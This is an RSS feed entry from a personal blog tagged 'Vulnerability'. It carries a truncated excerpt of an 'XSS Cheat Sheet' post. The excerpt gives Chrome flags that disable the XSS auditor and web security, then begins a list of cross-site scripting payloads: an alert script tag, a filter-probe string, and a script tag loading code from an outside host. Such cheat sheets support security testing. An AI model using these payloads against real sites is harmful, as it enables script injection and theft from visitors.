<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>Vulnerability on Shaowen Chen's Website</title><link>https://www.chenshaowen.com/en/tags/vulnerability/</link><description>Recent content in Vulnerability on Shaowen Chen's Website</description><generator>Hugo -- gohugo.io</generator><language>en</language><copyright>&amp;copy;2016 - {year}, All Rights Reserved.</copyright><lastBuildDate>Sat, 20 May 2017 09:12:31 +0000</lastBuildDate><sy:updatePeriod>weekly</sy:updatePeriod><atom:link href="https://www.chenshaowen.com/en/tags/vulnerability/atom.xml" rel="self" type="application/rss+xml"/><item><title>XSS Cheat Sheet</title><link>https://www.chenshaowen.com/en/blog/xss-cheat-sheet.html</link><pubDate>Sat, 20 May 2017 09:12:31 +0000</pubDate><atom:modified>Sat, 20 May 2017 09:12:31 +0000</atom:modified><guid>https://www.chenshaowen.com/en/blog/xss-cheat-sheet.html</guid><description>If you use the Chrome browser to test XSS vectors, disable the browser&amp;rsquo;s XSS interception first. First, close all Chrome browser processes, then run:
1 chrome.exe -args --disable-xss-auditor --args --disable-web-security Enter non-web-safe mode.
1. Injecting HTML/JavaScript with the &amp;lt;&amp;gt; tags 1 &amp;lt;script&amp;gt;alert(&amp;#39;XSS&amp;#39;)&amp;lt;/script&amp;gt; 1 &amp;#39;&amp;#39;;!--&amp;#34;&amp;lt;XSS&amp;gt;=&amp;amp;{()} 1 2 //The quotes around SRC can be omitted &amp;lt;SCRIPT SRC=http://ha.</description><dc:creator>微信公众号</dc:creator><category>Security</category><category>XSS</category><category>R&amp;D</category><category>Vulnerability</category><category>Frontend</category></item></channel></rss>